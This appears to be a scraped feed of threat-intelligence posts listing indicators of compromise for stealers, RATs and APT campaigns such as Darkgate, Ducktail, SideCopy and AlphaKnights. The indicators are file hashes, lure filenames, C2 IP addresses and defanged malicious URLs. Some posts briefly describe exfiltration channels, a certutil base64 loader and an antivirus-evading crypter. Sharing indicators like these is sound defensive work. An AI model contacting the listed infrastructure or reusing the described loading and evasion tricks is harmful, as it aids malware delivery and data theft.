Muggle Stealer c8ed60d1f24a7119612cd5bde0ddc1e1 - Go based Stealer - Collects WIFI & browser password, Screenshot, Disk Info - Exfiltrate data to 101.43.32[.]249 [Chinese IP 🇨🇳] #MuggleStealer #Stealer #IOC

1

11

18

Yogesh Londhe

@suyog41

2 months

Styx Stealer 7ef60ef8045c6bb90eaaf66e2c1c4954 #StyxStealer #Stealer #IOC

0

7

19

Yogesh Londhe

@suyog41

5 years

#njRAT #RevengRAT Crypter by HiDDen PerSOn private fud 100% bypass All anti virus, is not free, Price = 50$ 😂 check comments section for more fun Fud logic :- decode base64 -> xor -> load() sample :- @James_inthe_box @fumik0_

0

4

17

Yogesh Londhe

@suyog41

1 year

Darkgate Fresh_Mission_and_Core_Values.pdf.lnk ea64309358a12839a1e4272ad6ecc9d7 Position_Guidelines.pdf.lnk a8a3a5deeb035611614009c364b301cb Revamped_Organizational_Structure.pdf.lnk 97a5eda6622ca3981c372d4e137d2011 #Darkgate #Loader #IOC

MalwareHunterTeam

@malwrhunterteam

1 year

"Revamped_Organizational_Structure.pdf.lnk": 5480680bc9f42ca422c06e3a828511fa97eef1e1cc6fa65d5e8404037b6d856e "Fresh_Mission_and_Core_Values.pdf.lnk": b765ffaeb2d81db8c184c2be04567e35827d7ded9bfef175ce65490166d3ab8f http://5.188.87[.]58:2351/kzbrotjb

3

7

27

1

8

18

Yogesh Londhe

@suyog41

1 year

MuddyWater ae43211f00725ccb00c46a267c3f6833 #MuddyWater #APT #IOC

1

4

19

Yogesh Londhe

@suyog41

11 months

Ducktail Project_marketing_campaign_IPG_MB.zip b3995396a83eb2053aa860264bbd1361 IPG_MB_Company_details.exe 15b14a907ba179c4803aa364d76b7ea8 DetailsSalary_ RevenueBonus_Excel.exe bad7bad041c5455f180a07f9ba5347fe #Ducktail #APT #IOC

1

7

18

Yogesh Londhe

@suyog41

5 months

#SideCopy #ReverseRat #APT #IOC uploaded from 🇹🇼 6666[.]zip 45cd605ead9dc0eb0ad7471cf611b573 66d110f743c00c8f068ea81b2a093116 [docx] C2 185.174.102.54

0

9

18

Yogesh Londhe

@suyog41

2 months

Braodo Stealer APT3233 (SELF-PROCLAIMED) Doc1.docm 0fee354732496cdbdb4e78ecb218a81a Pun.bat 2b57c447f3b38cda11c4d6f1ea4895ae download payload & python library from GitLab gitlab[.com/DemoTrojan/real windows[.]py #Braodo f1897eec8259144236b84a051fa0f13b #Stealer #IOC

1

9

19

Yogesh Londhe

@suyog41

1 year

Simple msil downloader downloads LimeRAT AsyncRAT DcRat Eternity Stealer RedLine b8cfa222736bb2e4a133d5f2bfa54cb3 #IOC

0

3

19

Yogesh Londhe

@suyog41

2 years

Gurcu Stealer build.bat (bd19c59dd5861a3283fc6b534c51e3c7) -> decode and run embedded base64 binary via certutil build.exe (716D01D18140EC5E18B1A15C17FB213F) Exfiltrate data via telegram #GurcuStealer #Stealer #IOC

1

8

19

Yogesh Londhe

@suyog41

1 year

Skuld Stealer 31fcfe752d30c3f9cfb212a5f58568a7 ef6ee187f4154979d3fb8f88b2a41bc0 22763b501295ccddac371642ecd614c5 5741e39b9ec0a1a5f50bb1386761dae9 41036e32fd7953e2ffd62930c85b9005 192a8bf8a804e09670156b4bbb745387 7c86ede6ddf152a18b8beff7072b6bca #SkuldStealer #Stealer #IOC

2

9

17

Yogesh Londhe

@suyog41

6 months

#AlphaKnights #TransparentTribe #APT #IOC AlphaKnights What_is_Ramadan.exe a8c8ccccf9766d3bcd5dd78d4ae5a64aec55f961b8f3cf2bef74b4aef48422a3 C2 176.56.237.126 272724838[.]zip 6a0f2a6e800b5d063601f9e38c4903acdcdaf52ce86f2d54771941c779affab9

Yogesh Londhe

@suyog41

6 months

AlphaKnights drops uuid.exe 5c406e117cde3f5433bb3e11e163d88a9ed98c440ff5643682aeb288ca822159 C2 176.56.237.126 related Ayesha azami.exe 73c8d0ca7af0c623ef915f52ccc71f056936d1782071f452717f1a8a0c71ac57 #AlphaKnights #IOC

1

5

8

0

9

18